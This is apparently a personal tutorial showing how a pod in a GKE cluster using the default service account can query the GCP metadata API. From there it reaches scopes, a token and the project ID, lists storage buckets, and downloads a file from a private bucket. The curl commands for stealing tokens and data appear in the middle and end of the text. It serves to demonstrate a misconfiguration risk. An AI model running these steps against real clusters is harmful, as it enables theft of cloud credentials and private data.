John Mark Causing

System Administrator | Hosting Support Engineer

Bacolod City, Philippines

+639393497018

John Mark Causing

System Administrator | Hosting Support Engineer

Bacolod City, Philippines

+639393497018

Create a Cluster and Node Pool using the default service account

Create a pod and SSH to that pod

Example nginx.yml

apiVersion: v1
kind: Pod
metadata:
  name: nginx
spec:
  containers:
    - name: nginx
      image: nginx

Create that nginx pod then SSH to it.

C:\Users\JMC\k8s>kubectl apply -f nginx.yml
pod/nginx created

C:\Users\JMC\k8s>kubectl exec -ti nginx bash
kubectl exec [POD] [COMMAND] is DEPRECATED and will be removed in a future version. Use kubectl exec [POD] -- [COMMAND] instead.
[email protected]:/#

Above shows we just SSH logged in to that pod with root access.

Let’s demo how this is GKE cluster and node pool with GCP default service account will get a very high-security risk.

A pod can access a list of permission/scopes via curl accessing its GCP metadata API. So this means a pod has access to write logs, access logging.write, etc.

[email protected]:/# curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes
https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring
https://www.googleapis.com/auth/servicecontrol
https://www.googleapis.com/auth/service.management.readonly
https://www.googleapis.com/auth/trace.append

A pod can get the GCP service account token

Let’s perform Server-Side Request Forgery (SSRF) attack!

Get the project ID. Below shows a pod was able to get the project ID majestic-layout-340900

Get the GCP Cloud storage bucket names

curl -H "Authorization: Bearer TOKEN" "https://storage.googleapis.com/storage/v1/b?project=majestic-layout-340900"

So this is a private bucket with UniformBucketLevel access protection and `”uniformBucketLevelAccess” enabled which means the files are protected from public access

Below shows a pod can download a private content/file from a private bucket called private-bucket1

curl -H "Authorization: Bearer TOKEN" "https://storage.googleapis.com/storage/v1/b/private-bucket1/o/private.txt?generation=1648557043014755&alt=media" -o private.txt